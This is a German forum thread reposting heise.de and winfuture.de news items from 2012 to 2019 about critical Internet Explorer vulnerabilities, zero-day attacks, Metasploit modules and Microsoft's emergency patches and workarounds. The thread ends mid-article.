Der ganze Artikel (http://www.heise.de/newsticker/meldung/Microsoft-flickt-kritische-Internet-Explorer-Luecke-1711931.html)
Quelle : www.heise.de
Titel: Microsoft patcht kritische Internet-Explorer-Lücke
Beitrag von: SiLæncer am 22 September, 2012, 11:00
Microsoft hat die kritische Schwachstelle im Internet Explorer, die bereits aktiv für Angriffe ausgenutzt wird, am gestrigen Freitagabend mit einem Notfall-Update geschlossen. Die Lücke befindet sich in den IE-Versionen 6 bis 9 und führt dazu, dass ein Angreifer das System beim Besuch einer speziell präparierten Webseite mit Schadcode infizieren kann. Die Schwachstelle ist seit vergangenem Montag bekannt, seit Dienstag kursiert ein passendes Metasploit-Modul.
Bei dieser Gelegenheit hat Microsoft auch noch vier weitere Lücken ähnlicher Art geschlossen, die dem Unternehmen nach eigenen Angaben vertraulich von Sicherheitsexperten gemeldet und noch nicht für Angriffe ausgenutzt wurden. Den CVE-Nummern zufolge wurden die vier Schwachstellen deutlich vor dem Bekanntwerden der Lücke vom Montag gemeldet.
Der ganze Artikel (http://www.heise.de/security/meldung/Microsoft-patcht-kritische-Internet-Explorer-Luecke-1715036.html)
Quelle : www.heise.de
Titel: Sicherheit des Internet Explorer hinterfragt
Beitrag von: SiLæncer am 01 Oktober, 2012, 21:00
Wie unterschiedlich Statistiken zur Browsersicherheit ausgewertet werden können, zeigt Security-Blogger Brian Krebs: Zählt man nur die Lücken, schneidet der Internet Explorer im Vergleich mit der Konkurrenz ganz gut ab. Betrachtet man jedoch nur diejenigen Angriffspunkte, die tatsächlich ausgenutzt werden, ist die Bilanz des Internet Explorer vergleichsweise schlecht.
Krebs rechnet vor (http://krebsonsecurity.com/2012/10/in-a-zero-day-world-its-active-attacks-that-matter/#more-16949): Googles Chrome vermeldete für 2011 ganze 275, Mozillas Firefox 97, der Internet Explorer sogar nur 45 Angriffspunkte. Der Internet Explorer glänzt hier. Wird die Statistik nach Zero-Day-Exploits ausgewertet, die tatsächlich von bösartigen Seiten ausgenutzt wurden, fällt der Internet Explorer weit zurück.
Für die Zeit von Anfang 2011 bis September 2012 hat Krebs 89 Tage gezählt, an denen Internet-Explorer-Nutzer aktiv ausgenutzten Sicherheitslücken ausgesetzt waren, für die Konkurrenten Google Chrome und Mozilla Firefox hingegen keinen einzigen. Krebs argumentiert: "Der wichtigste Maßstab, um einen richtigen Zero-Day zu bewerten, sind aktive Angriffe." Das, befindet Krebs, ist auch für die Nutzer der wichtigste Aspekt.
Krebs hält nichts von der um sich greifenden Relativierung von Sicherheitsproblemen von Browsern. Es gibt messbare Abstufungen von Sicherheit und diese könnten durchaus einen zumindest zeitweiligen Browserwechsel nahelegen.
Quelle : www.heise.de
Titel: Internet Explorer mit Sicherheitslücke
Beitrag von: SiLæncer am 12 Dezember, 2012, 16:17
Der aktuelle Internet Explorer leidet an einer Sicherheitslücke. Und diese betrifft nicht nur die aktuelle Version, sondern alle Versionen von IE 6 bis IE 10. Die Informationen über diese Sicherheitslücke wurde auch schon vor Veröffentlichung im Netz (http://spider.io/blog/2012/12/internet-explorer-data-leakage/) an Microsoft gesendet, doch Microsoft hat bis jetzt nicht mitgeteilt, wann und ob man sich um die Sicherheitslücke kümmere. Konkret es ist möglich, sämtliche Mausbewegungen eines Benutzers zu protokollieren.
Dazu benötigt man keine speziell präparierte Seite, sondern der Code lässt sich auch durch externe Dienstleister in Form von Werbebannern und Co auf beliebigen Seiten einpflanzen. Die Finder der Lücke teilten mit, dass hier unter Umständen virtuelle Keyboards, die man ja nutzt, damit Keylogger nicht die Tastaturanschläge protokollieren, unnütz würden. Der Mauszeiger wird nicht nur getrackt, wenn er sich über dem Browserfenster bewegt, sondern auch außerhalb. Eine Demo befindet sich hier (http://iedataleak.spider.io/demo).
Titel: Kritische Zero-Day-Lücke im Internet Explorer
Beitrag von: SiLæncer am 29 Dezember, 2012, 11:30
Die Sicherheitsexperten von FireEye haben bei Analyse einer kompromittierten Webseite einen Exploit entdeckt, der eine bislang unbekannte Sicherheitslücke im Internet Explorer ausnutzt. Durch die Lücke kann ein Angreifer Schadcode ins System des IE-Nutzers einschleusen, wenn dieser eine speziell präparierte Webseite besucht. Anfällig sind alle IE-Versionen bis einschließlich Version 8. Höhere Versionen sind nach derzeitigem Kenntnisstand nicht betroffen.
Laut FireEye haben die Angreifer zunächsts mit Hilfe eines Flash-Applets Shellcode im Arbeitsspeicher verteilt (Heap Spraying). Über die Zero-Day-Lücke im IE gelang es schließlich, den Code auszuführen. Durch die Sicherheitslücke wurde eine DLL ins System eingeschleust, zu dessen Funktionen die Sicherheitsexperten bislang keine Angaben machten.
Der ganze Artikel (http://www.heise.de/security/meldung/Kritische-Zero-Day-Luecke-im-Internet-Explorer-1775002.html)
Quelle : www.heise.de
Titel: Patch für Internet-Explorer-Lücke veröffentlicht
Beitrag von: SiLæncer am 01 Januar, 2013, 13:30
Vor ein paar Tagen wurde eine kritische Zero-Day-Lücke für ältere Versionen des Internet Explorer gefunden, nun hat Microsoft einen "Fix it"-Patch dazu veröffentlicht, der die Exploit-Möglichkeit schließen soll.
Microsoft hat im 'Security Response Center (http://blogs.technet.com/b/msrc/archive/2012/12/31/fix-it-for-security-advisory-2794220-now-available.aspx)' in der Nacht auf heute einen Patch bereitgestellt, der die vor kurzem aufgetauchte Sicherheitslücke in den Versionen 6, 7 und 8 des Internet Explorers schließt. Das Unternehmen schreibt dazu, dass der 'Fix it (http://support.microsoft.com/kb/2794220?wa=wsignin1.0)' genannte Patch einfach und ohne Neustart angewendet werden kann.
Der ganze Artikel (http://winfuture.de/news,73819.html)
Quelle : http://winfuture.de/
Titel: Neuer Exploit für Lücke im Internet Explorer
Beitrag von: SiLæncer am 05 Januar, 2013, 18:00
Der Sicherheitsexperte Peter Vreugdenhil von der Firma Exodus Intelligence schreibt in einem Blog-Beitrag, die kürzlich von Microsoft veröffentlichte provisorische Korrektur eines Speicherfehlers im Internet Explorer ließe sich durch ein neues Verfahren umgehen. Betroffen sind die Browser-Versionen 6 bis 8.
Details zu dem neuen Angriff hat die Firma nicht veröffentlicht. Kasperskys Webdienst Threatpost zitiert einen Manager des Unternehmens: "Im Allgemeinen gibt es mehrere Wege, eine Sicherheitslücke auszunutzen. Der provisorische Fix hat nicht alle davon blockiert."
Der ganze Artikel (http://www.heise.de/newsticker/meldung/Neuer-Exploit-fuer-Luecke-im-Internet-Explorer-1777875.html)
Quelle : www.heise.de
Titel: Patch für kritische IE-Lücke in Sicht
Beitrag von: ritschibie am 14 Januar, 2013, 10:42
Microsoft will außer der Reihe ein Update herausgeben, das die kritische Lücke in den Internet Explorer-Versionen 6 bis 8 schließt. Es soll um 18 Uhr deutscher Zeit zur Verfügung stehen. Mit dem Update soll das provisorische Microsoft Fix-it-Tool abgelöst werden, das in der Kritik stand, nicht alle Wege zu blockieren, die den Exploit ausnutzbar machen.
Die Lücke wird von Cyber-Kriminellen bereits seit Ende vergangenen Jahres aktiv zur Verbreitung von Malware eingesetzt; sie eignet sich zum Einschleusen von Schadcode. An Microsofts Januar-Patchday, der vergangenen Dienstag stattgefunden hat, war noch kein Patch verfügbar.
Quelle: www.heise.de
Titel: Patch für kritische Lücke im Internet Explorer ist da
Beitrag von: SiLæncer am 14 Januar, 2013, 21:00
Wie heute Vormittag schon angekündigt haben die Entwickler aus Redmond gerade einen Patch für die Ende 2012 bekannt gewordene und als äußerst kritisch eingestufte 0-Day-Schwachstelle im Internet Explorer (IE) veröffentlicht.
Wirft man einen Blick auf das zugehörige Security-Bulletin MS13-008, so hat Microsoft dieses Update für den Internet Explorer in den Versionen 6, 7 und 8 unter verschiedenen Betriebssystemen zur Verfügung gestellt. Eine Installation des Updates wird allen Nutzern aus Sicherheitsgründen nahe gelegt.
Der ganze Artikel (http://winfuture.de/news,74067.html)
Quelle : http://winfuture.de/
Titel: Microsoft stopft kritische Lücke im Internet-Explorer
Beitrag von: SiLæncer am 15 Januar, 2013, 13:03
Microsoft hat den Patch für die kritische Sicherheitslücke in den Internet Explorer-Versionen 6 bis 8 herausgegeben. Laut Microsoft wurde die Schwachstelle nur in wenigen Fällen ausgenutzt. Allerdings gibt es ein Metasploit-Modul, mit dem theoretisch jeder die Lücke ausnutzen kann.
Der ganze Artikel (http://www.heise.de/security/meldung/Microsoft-stopft-kritische-Luecke-im-Internet-Explorer-1783762.html)
Quelle : www.heise.de
Titel: Schwere Sicherheitslücke im Internet Explorer 8
Beitrag von: SiLæncer am 04 Mai, 2013, 13:18
Eine Schwachstelle im Internet Explorer 8 ermöglicht das Ausführen beliebigen Programmcodes, wenn der Benutzer eine entsprechend präparierte Webseite aufruft. Das hat Microsoft heute in seiner Sicherheitsempfehlung 2847140 (http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx) bekannt gegeben. Die Versionen 6, 7, 9 und 10 seien nicht betroffen, darum wird ein Upgrade auf neuere Versionen empfohlen, so es das Betriebssystem zulässt (Mindestvoraussetzung: Windows Vista).
An einem Update für IE8, das die Schwachstelle schließt, wird bei Microsoft noch gearbeitet. Bis dieses bereit steht, sollten IE8-Nutzer die Sicherheitseinstellungen restriktiver gestalten:
Die Sicherheitseinstellungen für die Zonen „Internet“ und „Intranet“ sollte man auf „hoch“ stellen. Das blockiert auf solchen Seiten ActiveX-Controls und ActiveScripting und beeinträchtigt die Funktionsfähigkeit vieler Seiten. Eventuell müssen externe Sites deswegen als vertrauenswürdig gekennzeichnet werden, um sie zu benutzen. Darüber hinaus empfiehlt Microsoft, den IE so einzustellen, dass er vor jedem Ausführen von ActiveScripting eine Warnmeldung ausgibt.
Quelle : www.heise.de
Titel: Exploit für kritische Zero-Day-Lücke im Internet Explorer 8
Beitrag von: SiLæncer am 07 Mai, 2013, 13:25
Für die kritische Schwachstelle im Internet Explorer 8 kursiert ein passendes Metasploit-Modul, mit dessen Hilfe quasi jedermann die Lücke ausnutzen kann – das bedeutet im Umkehrschluss: Der Einsatz des IE8 ist derzeit hochgradig gefährlich. Das betrifft vor allem XP-Nutzer, da neuere IE-Versionen nur unter Windows Vista und aufwärts laufen.
Die Lücke basiert auf einem Use-After-Free-Fehler, also dem Zugriff auf einen bereits freigegebenen Speicherbereich. Anfangs wurde die Schwachstelle nur für sogenannte Waterhole-Attacken im Rahmen der "Deep Panda"-Kampange eingesetzt. Die Cyber-Kriminellen haben offenbar gezielt Webseiten attackiert, die von Personen aus dem US-Energiesektor aufgerufen werden.
Der ganze Artikel (http://www.heise.de/security/meldung/Exploit-fuer-kritische-Zero-Day-Luecke-im-Internet-Explorer-8-1857900.html)
Quelle : www.heise.de
Titel: Microsoft stopft Sicherheitslücke beim Internet Explorer 8
Beitrag von: SiLæncer am 09 Mai, 2013, 11:30
Für die vor wenigen Tagen bekannt gewordene schwere Sicherheitslücke bei Microsofts Webbrowser Internet Explorer 8 steht jetzt ein Gegenmittel bereit.
Wie der Konzern in seinem Sicherheits-Blog mitteilte, ist für das Problem 2847140 ein Fix veröffentlicht worden. Dieser solle von Nutzern des Internet Explorer 8 möglichst schnell installiert werden. Ein Reboot des Systems sei anschließend nicht notwendig.
Der ganze Artikel (http://winfuture.de/news,75975.html)
Quelle : http://winfuture.de/
Titel: Lücke im Internet Explorer für Angriffe genutzt
Beitrag von: SiLæncer am 18 September, 2013, 14:10
Microsoft untersucht momentan eine Sicherheitslücke (http://technet.microsoft.com/en-us/security/advisory/2887505) in allen unterstützten Versionen des Internet Explorers, die es Angreifern erlaubt, beliebigen Schadcode mit den Rechten des IE-Nutzers auszuführen. Laut Microsoft wird die Lücke momentan ausgenutzt, um Internet Explorer 8 und 9 auf Windows XP und 7 anzugreifen. Diese Angriffe finden den Kenntnissen von Microsoft nach aber nur in sehr begrenztem Umfang und sehr gezielt statt. Im TechNet-Portal können Nutzer einen Fix-it-Hotpatch (http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx) herunterladen, um die Lücke zu schließen. Einen vollen Patch will man am nächsten Patch-Day im Oktober nachliefern.
Der Angriff findet über eine Use-After-Free-Schwachstelle in der HTML-Engine des Browsers statt. Diese nutzt eine Microsoft-Office-DLL zur Darstellung von Hilfe-Seiten, welche ohne Unterstützung für Address Space Layout Randomization (ASLR) kompiliert wurde. Ohne ASLR befinden sich die Bibliotheksfunktionen bei jedem IE-Start an der selben Speicheradresse; der Code lässt sich also zum Erstellen eines Exploits etwa mit Return-Oriented-Programming (ROP) nutzen.
Laut Microsoft sind die Versionen von Internet Explorer auf Server-Betriebssystemen in ihrer Standard-Konfiguration nicht betroffen, da sie Webseiten im geschützten Modus des Browsers anzeigen. Das gilt auch für Outlook, Outlook Express und Live Mail. Allerdings kann ein Angreifer hier Schadcode ausführen, falls er einen Nutzer dazu bringen kann, auf Links zu einer präparierten Webseite zu klicken -- diese wird dann im IE geöffnet. Ein gelungener Angriff ermöglicht es, Code mit den selben Rechten wie der Nutzer des Internet Explorers auszuführen. Falls der Nutzer mit Administratorrechten surft, könnte der Angreifer den Zielrechner wahrscheinlich komplett kapern.
Microsoft arbeitet nach eigenen Angaben noch an einem umfassenden Patch für die Lücke. Ebenso wolle man akute Gefahren im Auge behalten und Schritte gegen Seiten, die Schadcode mit Hilfe der Lücke verteilten, unternehmen.
Quelle : www.heise.de
Titel: Gelber Alarm für den Internet Explorer
Beitrag von: SiLæncer am 21 September, 2013, 15:19
Das Internet Storm Center (ISC) erhöht zum ersten Mal seit langem die Gefahrenstufe (Threat Level) für den Internet Explorer auf gelb : Die Sicherheitsexperten hätten Anzeichen dafür, dass die vorige Tage bekannt gewordene Sicherheitslücke schon seit August für Exploits genutzt werde und dass bald ein Metasploid-Modul erscheinen werde, mit dem jedermann die Lücke leicht ausnutzen könne.
Abhilfe schafft ein Fix-it-Hotpatch von Microsoft, den Nutzer des Internet Explorer sofort einspielen sollten. Microsoft will einen vollen Patch am nächsten Patch-Day im Oktober nachliefern.
Quelle : www.heise.de (http://www.heise.de/security/meldung/Gelber-Alarm-fuer-den-Internet-Explorer-1963824.html?wt_mc=sm.feed.tw.security)
Titel: Exploit für ungepatchte Internet-Explorer-Lücke
Beitrag von: SiLæncer am 01 Oktober, 2013, 18:30
Internet-Explorer-Nutzer aufgepasst: Das Waffenarsenal des Angriffsframeworks Metasploit wurde um ein Modul ergänzt, das die kritische Zero-Day-Lücke im IE ausnutzen kann. Somit kann sich nun jedermann eine passende Exploit-Webseite zusammenbauen. Das Modul ie_setmousecapture_uaf entstand, nachdem ein Sicherheitsforscher den Angriffscode mit dem JavaScript-Deobfuscator jsunpack untersucht hatte, wodurch der Code in das öffentlich zugänglich Archiv des Dienstes aufgenommen wurde.
Der ganze Artikel (http://www.heise.de/security/meldung/Exploit-fuer-ungepatchte-Internet-Explorer-Luecke-1970621.html?wt_mc=sm.feed.tw.security)
Quelle : www.heise.de
Titel: Zero-Day-Lücke im Internet Explorer für Angriffe ausgenutzt
Beitrag von: SiLæncer am 11 November, 2013, 16:40
Sicherheitsexperten haben eine Zero-Day-Lücke im Internet Explorer entdeckt, die momentan aktiv für gezielte Angriffe ausgenutzt wird. Die Lücke betrifft die Internet-Explorer-Versionen 7 bis 10 unter Windows XP und Windows 7. Zusammen mit einer Lücke in der TIFF-Darstellung von Windows, befinden sich damit momentan zwei Windows-Schwachstellen im Umlauf, die Microsoft bis jetzt nicht geschlossen hat.
Der ganze Artikel (http://www.heise.de/security/meldung/Zero-Day-Luecke-im-Internet-Explorer-fuer-Angriffe-ausgenutzt-2043329.html?wt_mc=sm.feed.tw.security)
Quelle : www.heise.de
Titel: Angriffe über Zero-Day-Lücke im Internet Explorer
Beitrag von: SiLæncer am 14 Februar, 2014, 14:15
Im IE klafft eine kritische Schwachstelle, durch die man seinen Rechner beim Surfen mit Schadcode infizieren kann. Sie wird bereits für gezielte Cyber-Angriffe missbraucht.
Im Internet Explorer klafft eine kritische Sicherheitslücke, die bereits für gezielte Cyber-Attacken missbraucht wird. Konkret haben es die Angreifer derzeit auf den Internet Explorer 10 abgesehen, Berichten zufolge ist zumindest auch der IE 9 anfällig. Entdeckt wurde der Angriff von der Sicherheitsfirma FireEye. Cyber-Kriminelle platzierten den Exploit-Code auf der Webseite der US-Kriegsveteranenorganisation Veterans of Foreign Wars (VFW), vermutlich um gezielt Opfer im militärischen Umfeld zu finden.
Der ganze Artikel (http://www.heise.de/newsticker/meldung/Angriffe-ueber-Zero-Day-Luecke-im-Internet-Explorer-2113169.html)
Quelle : www.heise.de
Titel: Zero-Day-Exploit gegen Internet Explorer: Microsoft liefert Workaround
Beitrag von: SiLæncer am 20 Februar, 2014, 16:49
Microsoft hat ein Fix-It-Tool für die bereits aktiv ausgenutzte Zero-Day-Lücke für Internet Explorer 9 und 10 veröffentlicht. Man arbeite an einem Update und empfiehlt in der Zwischenzeit allen Kunden, das Fix-It-Tool zu nutzen.
Microsoft hat ein Fix-It-Tool für die ungepatchte Zero-Day-Lücke im Internet Explorer herausgebracht. Das Tool schützt Nutzer vor den bisher bekannten Angriffen auf Internet Explorer 9 und 10, schließt aber die eigentliche Lücke nicht. Microsoft sagt nur, dass die HMTL-Renderengine des Browsers mit einem "shim" versehen wird, weitere Details zur Funktion des Workarounds gab die Firma nicht bekannt. Die Use-after-free-Schwachstelle wird momentan für Angriffe auf den Interner Explorer 10 ausgenutzt, indem Schadcode auf gehackten Webseiten platziert wird.
Der ganze Artikel (http://www.heise.de/security/meldung/Zero-Day-Exploit-gegen-Internet-Explorer-Microsoft-liefert-Workaround-2119675.html?wt_mc=sm.feed.tw.security)
Quelle : www.heise.de
Titel: Internet Explorer: Microsoft warnt vor Zero-Day-Exploit
Beitrag von: SiLæncer am 27 April, 2014, 11:43
Das Sicherheitsunternehmen FireEye hat einen Zero-Day-Exploit gefunden, der alle Internet Explorer seit Version 6 betrifft und bereits angegriffen wird. Microsoft verspricht eine Überprüfung und Abhilfe.
Microsoft hat eine kritische Sicherheitslücke in allen Internet-Explorer-Versionen seit 6 eingeräumt (https://technet.microsoft.com/en-US/library/security/2963983). Damit bestätigte der Konzern einen Bericht des Sicherheitsunernehmens FireEye, das auf den Zero-Day-Exploit aufmerksam gemacht (http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html) und erklärte hatte, es gebe bereits Angriffe über diese Lücke auf die Internet-Explorer-Versionen 9 bis 11. Über die Schwachstelle könne Code ausgeführt werden ("Remote Code Execution"), wenn der Browser versuche, auf ein Objekt im Speicher zuzugreifen, dass da gar nicht liege. Angreifer könnten das über eine präparierte Website auslösen. Laut Fireeye benötigt der in den aktuellen Angriffen verwendete Exploit Flash, um ASLR auszutricksen. Ist Flash deaktiviert, funktioniert zumindest dieser Angriff nicht mehr.
In seiner Stellungnahme kündigt Microsoft an, die Lücke nun genau untersuchen zu wollen und dann "geeignete Maßnahmen" zu ergreifen. Das könne eine Behebung des Problems im monatlichen Sicherheitsupdate umfassen oder aber ein eigenes Update außer der Reihe, wenn das nötig sei. Um sich schon vorher zu schützen, rät Microsoft, unter "Extras/Internetoptionen" den erweiterten geschützten Modus zu aktivieren: Dazu muss man jeweils bei "64-Bit-Prozesse für erweiterten geschützten Modus aktivieren" und bei "Erweiterten geschützten Modus aktivieren" einen Haken setzen. Das sei allerdings nur im Internet Explorer 10 und 11 möglich.
Quelle : www.heise.de
Titel: Zero-Day-Lücke in Internet Explorer: Microsoft patcht außerplanmäßig - auch XP
Beitrag von: SiLæncer am 02 Mai, 2014, 08:27
Eine schwere Lücke in Microsofts Webbrowser Internet Explorer von Version 6 bis 11 wird aktiv ausgenutzt: Microsoft sieht sich zu einen Patch außer der Reihe veranlasst. Auch das eigentlich nicht mehr unterstützte Windows XP wird berücksichtigt.
Eine offene Sicherheitslücke in aktuellen Webbrowser-Versionen sind kein Spaß – schon gar nicht, wenn Zero-Day-Exploits kursieren und die Lücke aktiv ausgenutzt wird. So warnte denn auch das BSI angesichts eines akuten Lecks im Internet Exlorer seit Version 6 vor der Nutzung von Microsofts Webbrowser, ebenso wie das US-CERT. Microsoft sieht sich angesichts dieser Situation veranlasst, einen schnellen Patch außer der normalen Update-Reihe herauszubringen, um das Leck zu schließen. Und das gilt ausnahmsweise auch für Windows XP, obwohl der offizielle Support für das Betriebssystem seit einigen Tagen ausgelaufen ist und Sicherheitslücken bei XP damit normalerweise nicht mehr geschlossen werden.
Der ganze Artikel (http://www.heise.de/security/meldung/Zero-Day-Luecke-in-Internet-Explorer-Microsoft-patcht-ausserplanmaessig-auch-Windows-XP-2181142.html)
Quelle : www.heise.de
Titel: Internet Explorer blockiert verwundbare ActiveX-Steuerelemente
Beitrag von: SiLæncer am 07 August, 2014, 18:07
Laut Microsoft zielten über 80 Prozent alle Exploit-Angriffe im vergangenen Jahr auf Java ab. Das liegt vor allem daran, dass veraltete Plug-ins im Einsatz sind. Mit einem Update will Microsoft gegensteuern.
Microsoft will an seinem Patchday am kommenden Dienstag ein Update für den Internet Explorer veröffentlichen, mit dem alte und möglicherweise gefährliche ActiveX-Steuerelemente blockiert werden können. Diese Elemente erfüllen im Internet Explorer die Rolle der Plug-ins und erlauben so zum Beispiel die Ausführung von Java. Werden sie nicht regelmäßig aktualisiert, können sie ein erhebliches Sicherheitsrisiko darstellen.
Der ganze Artikel (http://www.heise.de/newsticker/meldung/Internet-Explorer-blockiert-verwundbare-ActiveX-Steuerelemente-2288287.html)
Quelle : www.heise.de
Titel: Zero Day-Lücke im Internet Explorer: CERT rät dringend zum Umstieg
Beitrag von: SiLæncer am 05 Dezember, 2014, 14:23
Wer unter Windows den Internet Explorer verwendet, sollte sich vielleicht zumindest vorübergehend nach einer Alternative umschauen. Denn eine neue Zero Day-Schwachstelle birgt das Risiko, in den kommenden Tagen mit Exploits ausgenutzt zu werden.
Eine entsprechende Warnung hat das österreichische CERT heute veröffentlicht. Dabei beziehen sich die Sicherheits-Experten auf ein Advisory, das vom Unternehmen Tipping Point bereitgestellt wurde und auf das Problem hinweist. Nach dem aktuellen Stand der Untersuchungen ist der Internet Explorer in den Versionen 8, 9, 10 und 11 von der Sicherheitslücke betroffen.
Die Schwachstelle ermöglicht es Angreifern, Drive-by-Attacken durchzuführen. Es genügt also der Abruf einer manipulierten Webseite, damit Malware ihren Weg auf den Rechner findet. Auf diese werden Anwender in der Regel über Spam-Mails gelockt, es kann aber durchaus auch passieren, dass Kriminelle ihre Schadcodes in eigentlich seriöse Seiten einschleusen.
Durch die Schwachstelle wird das Aufbringen von Schadroutinen möglich, die mit den Rechten des gerade angemeldeten Benutzers agieren können. Dadurch kommt eine Malware zwar nicht allzu tief in das System hinein, wenn der User nicht gerade einen Administrator-Account verwendet, doch das Schadenspotenzial ist auch so groß genug. Denn vor dem persönlichen Daten sind keine weiteren Schranken vorhanden, so dass diese ausgeleitet werden können.
Gegenmaßnahmen einleiten
Aktuell ist noch unklar, wann Microsoft einen Patch bereitstellen kann. Zwar soll am kommenden Patch Day in der nächsten Woche ein Internet Explorer-Update kommen, aber es ist unklar, ob dieses das genannte Problem betrifft. Bis die Lücke behoben ist, rät das CERT zu einem Wechsel auf einen alternativen Browser. Wo dies nicht möglich ist, sollten zumindest die Sicherheits-Einstellungen hochgesetzt und die Ausführung von Skripten unterbunden werden.
Bis jetzt ist noch kein Exploit entdeckt worden, der die Zero Day-Sicherheitslücke ausnutzt. Das sollte den Angaben zufolge aber nicht dazu verleiten, das Problem auf die leichte Schulter zu nehmen. Denn es sei anzunehmen, dass sich nach der nun erfolgten Veröffentlichung diverse Akteure darauf konzentrieren werden, die Schwachstelle im Detail zu finden und für ihre Zwecke auszunutzen.
Quelle : http://winfuture.de/
Titel: Internet Explorer 11 lässt Webseiten Anwender ausspionieren
Beitrag von: SiLæncer am 02 Februar, 2015, 17:03
Sicherheitsexperten haben eine Schwachstelle im Internet Explorer 11 gefunden, über die Angreifer Webseiten so manipulieren können, dass sie den Anwender ausspionieren. Ein Patch lässt noch auf sich warten – andere Web-Browser sind aber nicht anfällig.
Microsofts Internet Explorer 11 weist eine gewichtige Sicherheitslücke auf: Er schottet Webseiten nicht ausreichend gegeneinander ab. Das hat ein Nutzer in einer Security-Mailing-List mitgeteilt. Demzufolge könnten Angreifer Webseiten bauen, die parallel geöffnete Seiten manipulieren, um etwa Nutzerdaten im Zuge des Online-Bankings abzugreifen. Diese Vorgehensweise nennt man Universal Cross-Site-Scripting (UXSS).
Der ganze Artikel (http://www.heise.de/newsticker/meldung/Internet-Explorer-11-laesst-Webseiten-Anwender-ausspionieren-2534975.html)
Quelle : www.heise.de
Titel: Microsoft: Meine Lücken schließ' ich nicht
Beitrag von: SiLæncer am 20 Juni, 2015, 18:04
Sicherheitsexperten geben Details zu Lücken in Internet Explorer heraus, weil Micosoft die Lücken nicht schließen will.
Im Security Research Blog haben HP-Mitarbeiter entgegen ihrer Gepflogenheiten Details ihrer Forschungen zu Lücken im Internet Explorer veröffentlicht. Die Sicherheitsexperten der HP Zero Day Initiative hatten sich bisher an die Regeln ihres eigenen "vulnerability-disclosure"-Programms gehalten und ihre Forschungsergebnisse zu den IE-Lücken bereits 2014 an Microsoft weitergegeben. Als Annerkennung dafür gabe es die von Microsoft im Rahmen des Programms Mitigation Bypass Bounty ausgelobten 125.000 Dollar. Nach Ablauf der 120 Tage des üblichen Stillhalteabkommens hatte die HP ZDI im Februar 2015 die gefundenen Lücken bekanntgegeben, jedoch ohne Details.
Nun habe ihnen Microsoft mitgeteilt, dass man nicht vorhabe, diese Lücken, die mit dem Fehler in der Address Space Layout Randomization (ASLR) zu tun haben, zu schließen. Die Sicherheitsexperten der ZDI hätten schon einige Erfahrungen damit gesammelt, was passiere, wenn man einem großen Unternehmen mitteilt, dass sein Flaggschiff ein Problem aufweist. Es sei wohl so ähnlich, als wenn man stolzen Eltern sagt, ihr Baby sei hässlich.
Da sie glauben, diese Lücken gefährden das Internet, sehen sie sich gezwungen, an die Öffentlichkeit zu gehen. Microsoft begründe seine Weigerung mit zwei Argumenten: Erstens würden 64-Bit-Versionen des IE durch ASLR gut geschützt und zweitens habe die mit dem Patch MS14 vom Juli 2014 installierte MemoryProtection zu einer signifikant sinkenden Missbrauchsrate beim IE geführt.
Dem halten die Experten der Zero Day Initiative entgegen, dass eben die 32-Bit-Versionen des IE betroffen sei und es von der Millionen von Installationen gäbe. Und so bleibe der Internet Explorer weiter ein bevorzugtes Ziel der Angreifer. Ob nun die genaue Beschreibung der Exploits in einem White Paper Mircrosoft (http://h30499.www3.hp.com/hpeb/attachments/hpeb/off-by-on-software-security-blog/599/1/WP-Hariri-Zuckerbraun-Gorenc-Abusing_Silent_Mitigations.pdf) zum Nachbessern bewegt, bleibt abzuwarten.
Quelle : www.heise.de
Titel: Vier offene Lücken im mobilen Internet Explorer
Beitrag von: SiLæncer am 24 Juli, 2015, 20:51
HPs hatte vor sechs Monaten vier Lücken in der mobilen Version des Internet Explorers an Microsoft gemeldet. Nachdem ein Update immer noch aussteht, wurden nun die Details veröffentlicht. Die Lücken ermöglichen das Ausführen von Schadcode aus der Ferne.
Die zu HP gehörende Zero Day Initiative (ZDI) hat mal wieder offene Lücken in Microsoft-Produkten veröffentlicht, nachdem Microsoft nach sechs Monaten immer noch keinen Patch geliefert hat. Bei den vier Lücken handelt es sich um Bugs in der mobilen Version des Internet Explorers, die missbraucht werden können, um Schadcode auszuführen. Allerdings funktioniert das wohl nur mit den Rechten des Browsers und erlaubt nicht ohne weiteres ein Kapern des gesamten Gerätes.
Der ganze Artikel (http://www.heise.de/newsticker/meldung/Vier-offene-Luecken-im-mobilen-Internet-Explorer-2762638.html)
Quelle : www.heise.de
Titel: Notfall-Update für den Internet Explorer
Beitrag von: SiLæncer am 19 August, 2015, 13:48
Microsoft schließt außer der Reihe eine von Google entdeckte kritische Lücke in seinem IE.
Mit einem Notfall-Patch stopft Microsoft ein kritisches Sicherheitsloch im Internet Explorer 7 bis 11 (https://technet.microsoft.com/library/security/MS15-093), das Angreifer zum Einschleusen von Schadcode nutzen können. Es handelt sich um einen Fehler im Speichermanagement des IE. Gerät man mit dem Browser auf eine speziell präparierte Webseite, wird der Code des Angreifers mit den Rechten des angemeldeten Nutzers ausgeführt und das System kompromittiert.
Entdeckt wurde die Schwachstelle von dem bei Google angestellten Sicherheitsforscher Clément Lecigne. Sie wird bereits aktiv für Online-Angriffe ausgenutzt. Der in Windows 10 integrierte Edge-Browser ist laut Hersteller von der Schwachstelle nicht betroffen.
[Update vom 19. August, 10:50] In der ersten Fassung der Tickermeldung stand, dass Microsoft keine Angaben dazu macht, ob die Lücke bereits ausgenutzt wird. Im Advisory erklärt das Unternehmen jedoch, dass bereits Angriffe bekannt sind.
Quelle : www.heise.de
Titel: Notfallpatch: Attacken gegen Internet Explorer
Beitrag von: SiLæncer am 24 September, 2019, 13:05
Ein Update schließt eine kritische Lücke im Internet Explorer – es ist aber noch nicht über Windows Update verfügbar. Auch Windows Defender bekommt einen Patch.
Derzeit haben es Angreifer auf Nutzer mit Windows-Computern abgesehen, die mit dem Internet Explorer surfen. Ist eine Attacke erfolgreich, ist die Ausführung von Schadcode vorstellbar. Ein Sicherheitspatch ist verfügbar, aber noch nicht über Windows Update.
Für einen erfolgreichen Übergriff müssen Angreifer Opfer lediglich auf eine präparierte Website locken. Der Besuch triggert die als "kritisch" eingestufte Schwachstelle (CVE-2019-1367) in der Speicherverwaltung (Scripting Engine), was in einem Speicherfehler resultiert.
Darüber könnten Angreifer eigenen Code auf Computern mit den Rechten des Opfers ausführen. Hat ein Opfer zum Zeitpunkt der Attacke Admin-Rechte, können die Angreifer die volle Kontrolle übernehmen, warnt Microsoft in einem Beitrag.
Update manuell herunterladen
